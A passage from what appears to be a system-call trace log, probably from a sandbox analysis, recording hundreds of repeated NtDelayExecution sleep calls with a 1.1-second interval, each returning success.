(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.103] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.109] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.115] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.125] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.126] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.127] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.133] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.155] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.161] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.170] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.173] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.176] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.198] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.222] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.223] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.226] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.227] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.228] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.251] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.254] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.255] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.260] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.263] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.266] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.268] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.274] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.275] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.277] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.280] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.286] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.289] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.340] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.342] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.345] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.507] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.535] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.574] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.590] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.603] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.606] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.631] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.643] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.689] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.691] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.692] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.694] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.695] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.697] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.698] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.700] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.705] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.707] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.708] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.710] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.711] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.713] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.716] NtDelayExecution 